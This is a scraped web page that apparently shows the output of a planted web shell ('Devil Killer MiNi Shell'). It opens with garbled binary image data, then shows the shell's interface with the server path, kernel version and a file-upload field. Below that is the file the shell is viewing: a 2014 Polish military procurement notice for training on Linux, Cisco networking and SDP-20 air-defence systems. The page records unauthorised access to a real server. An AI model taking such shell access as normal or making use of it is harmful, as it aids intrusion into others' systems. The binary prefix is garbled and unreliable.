JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140611/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140611/197182-N-2014.html

<p class="kh_header"><b>Radom: Szkolenie obsług w zakresie eksploatacji i budowy obiektu SDP-20 w Jednostce Wojskowej 3688 w Sochaczewie oraz w Jednostce Wojskowej 3411 w Grójcu 
w  2014 r.</b><br>
<b>Numer ogłoszenia: 197182 - 2014; data zamieszczenia: 11.06.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa 4938 , ul. Sadków 9, 26-603 Radom, woj. mazowieckie, tel. 48 6511500, faks 48 6511300.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka Wojskowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Szkolenie obsług w zakresie eksploatacji i budowy obiektu SDP-20 w Jednostce Wojskowej 3688 w Sochaczewie oraz w Jednostce Wojskowej 3411 w Grójcu 
w  2014 r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest przeprowadzenie kursów, szkoleń specjalistycznych 
w zakresie:
1.Administrowanie systemem Linux Debian do poziomu zaawansowanego.  
2.Administrowanie i zarządzanie sieciami CCNA CISCO.
3.Administrowanie obiektem SDP-20 i SDP-10.
4.Obsługa i użytkowanie aplikacji Oficera Analizy Sytuacji Powietrznej.
5.Obsługa i użytkowanie aplikacji Planowanie Ugrupowania.
6.Obsługa i użytkowanie aplikacji Edytor Dokumentów Sformalizowanych.
7.Transportowanie i zmiana położenia z bojowego w marszowe (i odwrotnie) obiektów SDP-20 i SDP-10.
8.Zarządzanie ryzykiem w bezpieczeństwie informacji.
9.Administrowanie i obsługa systemu Windows 7.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 09.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości:
a)część I: 3 046,88 zł;
b)część II: 1 640,62 zł;
c)część III: 1 718,75 zł;
d)część IV: 156,25 zł;
e)część V: 468,75 zł;
f)część VI: 156,25 zł;
g)część VII: 1093,75 zł;
h)część VIII: 1718,75 zł;
i)część IX: 400,00 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna za spełnienie tego warunku, jeżeli Wykonawca przedstawi:1.aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej 2.aktualne zaświadczenie właściwego naczelnika Urzędu Skarbowego potwierdzające, że Wykonawca nie zalega z opłaceniem podatków lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 3. aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne, społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy uzna za spełnienie tego warunku, jeżeli Wykonawca przedstawi: wykaz co najmniej 3 wykonanych lub wykonywanych  usług szkoleniowych w okresie ostatnich 3 lat, (jeżeli okres działalności jest krótszy - w tym okresie). Zakres zrealizowanych usług szkoleniowych musi być zbliżony z przedmiotem zamówienia (załącznik nr 1 do SIWZ). W celu spełnienia tego warunku Wykonawca zobowiązany jest do załączenia co najmniej trzech dowodów potwierdzających, że usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca złoży podpisane oświadczenie (załącznik nr 4).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca złoży podpisane oświadczenie (załącznik nr 4).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie tego warunku, jeżeli Wykonawca złoży podpisane oświadczenie (załącznik nr 4).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie potwierdzające uprawnienia do wydania dokumentu (certyfikatu) nabycia umiejętności w zakresie administrowania przedmiotowym systemem teleinformatycznym wynikającym z załącznika nr 2 pkt 8 i 9 Decyzji Nr 7/MON z dnia 20 stycznia 2012 r. w sprawie organizacji ochrony systemów teleinformatycznych przeznaczonych do przetwarzania informacji niejawnych w resorcie obrony narodowej (Dz. Urz. MON z 09.02.2012 r., poz. 8) - wymagane w części I - zgodnie z załącznikiem nr 1 do umowy. 
Oświadczenia o spełnianiu warunków określonych w art. 22 ust. l ustawy -Prawo zamówień publicznych (załącznik nr 4 do SIWZ). Oświadczenia o spełnianiu warunków określonych w art. 24 ust. 1 i 2 ustawy -Prawo zamówień publicznych (załącznik nr 5 do SIWZ).Oświadczenie, o spełnianiu warunków określonych w art. 24 ust. 2 pkt 5 ustawy - Prawo zamówień publicznych (załącznik nr 6 do SIWZ);Wypełniony i podpisany formularz ofertowy - załącznik nr 2. Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług szkoleniowych w okresie ostatnich 3 lat, nie mniej niż 3 usługi (jeżeli okres działalności jest krótszy - w tym okresie). Zakres zrealizowanych usług szkoleniowych musi być zbliżony z przedmiotem zamówienia (załącznik nr 1 do SIWZ). Wykonawca zobowiązany jest do załączenia dowodów potwierdzających, że usługi te zostały wykonane należycie. W odniesieniu do usług  nadal wykonywanych dowodami poświadczenia powinny być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postepowaniu. Kserokopię wniesienia wadium - w przypadku realizowania przez Wykonawcę rozliczeń bankowych w formie elektronicznej do oferty należy załączyć potwierdzenie wykonania operacji bankowej w formie kserokopii wydruku operacji. Zarówno kserokopia dowodu bankowego jak i dowodu pochodzącego z systemu elektronicznych rozliczeń wymaga potwierdzenia przez Wykonawcę za zgodność z oryginałem; Pełnomocnictwo - w przypadku poświadczenia za zgodność z oryginałem kopii dokumentów przez osoby niewymienione w dokumencie rejestracyjnym Wykonawcy, musi zostać złożone pełnomocnictwo w formie oryginału (wystawionego przez osoby wymienione we właściwym rejestrze) lub kserokopii poświadczonej notarialnie.Pełnomocnictwo dla podmiotów występujących wspólnie musi być wystawione przez wszystkich Wykonawców ubiegających się o udzielenie zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość dokonania takiej zmiany w ogłoszeniu o zamówieniu lub w specyfikacji istotnych warunków zamówienia oraz określił warunki takiej zmiany (art. 144 ust. 1). 2.Zamawiający przewiduje możliwość zmiany wartości umowy spowodowanej zmianą stawki podatku od towaru i usług (VAT). 3.Zamawiający zastrzega sobie prawo zmiany sposobu wykonania przedmiotu zamówienia z powodu:1)uzasadnionych zmian, których nie można było wcześniej przewidzieć;
2)z powodu okoliczności siły wyższej.
4.Zamawiający przewiduje możliwość dokonania nieistotnych zmian, o których mowa w pkt 3 niniejszego nagłówka w przypadku przekształceń podmiotowych po stronie Wykonawcy skutkujących następstwem prawnym, a także w przypadku zmiany adresu, nazwy Wykonawcy lub Zamawiającego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.42blsz.wp.mil.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Jednostka Wojskowa 4938, ul. Sadków 9, 26-603 Radom, budynek SZTABU, nr pokoju 1..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.06.2014 godzina 09:30, miejsce: Jednostka Wojskowa 4938, ul. Sadków 9, 26-603 Radom, budynek SZTABU, nr pokoju 242 Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenia w zakresie administrowania systemem operacyjnym Linux Debian do poziomu zaawansowanego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zagadnienia obowiązkowo objęte szkoleniem:
1)BLOK I - Przygotowanie do instalacji Linuksa:
a)przygotowanie dysku twardego;
b)instalacja systemu operacyjnego i aplikacji;
2)BLOK II - Poznawanie podstawowych poleceń Linuksa:
a)cykl pracy systemu;
b)praca z wierszem poleceń systemu Linux;
c)praca z urządzeniami;
d)użyteczne programy systemu Linux;
3)BLOK  III - Konfiguracja i administracja systemu Linux: 
a)administracja użytkownikami i grupami;
b)administracja systemem plików;
c)uruchamianie i zatrzymywanie systemu i usług;
d)przeglądanie informacji systemowych i dzienników;
e)ustawianie czasu systemowego i strefy czasowej;
4)BLOK IV - Praca z aplikacjami i klientami systemu Linux:
a)aplikacje biurowe Linuksa;
b)pozostałe metody pracy biurowej; 
5)BLOK V - Konfiguracja sieci LAN opartej na systemie Debian GNU/Linux:
a)konfiguracja i administracja siecią;
b)Samba;
c)konfiguracja i używanie klientów Samby;
6)BLOK VI - Łączenie z siecią Internet:
a)łączenie z Internetem;
b)konfiguracja modemu;
c)praca z programem wvdial;
d)klient PPP;
e)przeglądarka internetowa;
f)klient gFTP;
g)programy minicom i seyon;
h)nawiązywanie połączenia PPP;
7)BLOK VII - Konfiguracja sieci WAN opartej na Linuksie:
a)serwer FTP;
b)instalacja i konfiguracja serwera WWW;
c)praca z serwerem pocztowym;
d)konfiguracja serwera Secure Shell (SSH);
e)konfiguracja serwera Dial-in;
8)BLOK VIII - Powłoka BASH:
a)powłoka Linuksa;
b)używanie powłoki;
c)poznawanie skryptów powłoki;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 17.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenia w zakresie administrowania 
i zarządzania sieciami CCNA CISCO..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zagadnienia obowiązkowo objęte szkoleniem:
1)BLOK I - Podstawy Technologii Sieciowych:
a)architektura sieci,
b)modele sieci (TCP IP oraz OSI),
c)protokoły IPv4 i IPv6,
d)system operacyjny IOS,
e)konfiguracja urządzeń sieciowych.
2)BLOK II - Routing:
a)routing statyczny,
b)routing dynamiczny,
c)protokoły routingu RIPv2, EIGRP, OSPF,
d)architektura wieloobszarowa OSPF.
3)BLOK  III - Switching: 
a)architektura i działanie sieci lokalnej,
b)VLAN y - protokół VTP,
c)routing między VLAN ami i Switche warstwy 3,
d)redundancja w warstwie 2 modelu OSI - protokół STP,
e)agregacja łączy,
f)redundancja w warstwie 3 modelu OSI - protokół HSRP.
4)BLOK IV - Usługi Sieciowe i WAN:
a)monitorowanie sieci,
b)bezpieczeństwo urządzeń i sieci - ACL,
c)usługi DHCPv4 i DHCPv6,
d)protokół NAT,
e)architektura łączy WAN,
f)połączenia szeregowe - protokół PPP,
g)protokół Frame-Relay..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 24.11.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkolenia w zakresie administrowania obiektem SDP-20 i SDP-10.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zagadnienia obowiązkowo objęte szkoleniem:
1)Monitorowanie i zarządzanie systemem:
a)instalacja systemów i oprogramowania,
b)administrowanie kontami użytkowników,
c)administrowanie bazą LDAP,
d)konfiguracja urządzeń sieciowych,
e)konfiguracja interfejsów obiektu,
f)konfiguracja i zarządzanie łączami Link 11B,
g)monitorowanie statusu urządzeń, 
h)monitorowanie procesów,
i)monitorowanie protokołu ASTERIX,
j)rozwiązywanie problemów z oprogramowaniem obiektu.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Szkolenia w zakresie obsługi oraz użytkowania aplikacji Oficera Analizy Sytuacji Powietrznej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zagadnienia obowiązkowo objęte szkoleniem:
1)BLOK I - Szkolenie ogólne - zapoznawcze:
a)opis i zasada działania systemu DUNAJ,
b)opis i zasada dziania protokołu ASTERIX,
c)opis i zasada działania protokołu Link 11B/Link 16,
d)podstawowe parametry techniczne obiektu SDP-20,
e)opis i zasada działania obiektu SDP-20,
f)opis i zasada współdziałania w relacji SDP-20 - SDP-10,
g)opis i zasada współdziałania w relacji SDP-20 - KDN,
h)opis i zasada współdziałania w relacji SDP-20 - stacja R/lok,
i)opis i zasada współdziałania w relacji SDP-20 - przełożony,
j)podstawowe pojęcia związane z aplikacją OASP,
k)opis Interfejsu graficznego użytkownika aplikacji OASP, wygląd, zobrazowanie 
i filtry tras powietrznych,
l)opis zobrazowanych tras powietrznych,
m)sposoby wizualizacji oceny zagrożenia tras,
n)symbole graficzne przy wyznaczaniu oceny możliwości zwalczania,
o)wizualizacja wykonania operacji rekomendacji,
p)wizualizacja tła taktycznego - opis,
q)opis i zasada działania zakładki trybu Dopisywanie Cech,
r)opis i zasada działania zakładki żądanie reinicjalizacji trasy LINK-11B,
s)opis i zasada działania zakładki GENEROWANIE NTN,
t)opis i zasada działania zakładki KONFIGURACJA ZOBRAZOWANIA ATO, ACO i SSTO,
u)opis i zasada działania zakładki OCENA ZAGROŻENIA.
2)BLOK II - Metodyka diagnozowania niesprawności aplikacji:
a)ogólne zasady wykrywania usterek związanych z aplikacją OASP.
3)BLOK III - wykorzystywanie pełnych możliwości technicznych urządzenia 
w realizacji pracy bojowej:
a)przygotowanie aplikacji OASP do pracy bojowej,
b)współdziałanie ze stacją radiolokacyjną podczas prowadzenia pracy bojowej.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.51.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 13.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szkolenia w zakresie obsługi 
i użytkowania aplikacji (grafiki) Planowanie ugrupowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zagadnienia szkoleniowe:
1)Prezentacja cyfrowej mapy rastrowej terenu
a)czytanie danych zawartych na mapie rastrowej;
b)nanoszenie na mapę MEZ I CMO;
c)nanoszenie na mapę pomocniczych figur geometrycznych;
d)zaznaczanie, wyznaczanie na mapie najniższych /najwyższych punktów.
2)Rozmieszczanie jednostek na mapie:
a)dodawanie usuwanie jednostek ugrupowania bojowego;
b)rozmieszczanie jednostek w ramach przydzielonej strefy (MEZ/BDZ);
c)tworzenie pokrycia możliwościami ogniowymi jednostek przydzielonej strefy MEZ/BDZ;
d)przedstawianie zobrazowania stref działania poszczególnych zespołów ogniowych;
e)przedstawianie pokrycia radiolokacyjnego na różnych wysokościach;
f)przedstawianie zasięgów rozpoznania SNR /RSWP;
g)definiowanie sektorów bojowych i rozpoznania dla dywizjonów/zespołów ogniowych;
h)przemieszczanie jednostek w ramach ugrupowania.
i)zapisywanie scenariusza rozmieszczenia jednostek ugrupowania oraz przesyłanie danych na inne stanowiska robocze obiektu SDP-20.
3)Edytowanie i dystrybucja dokumentów sformalizowanych: 
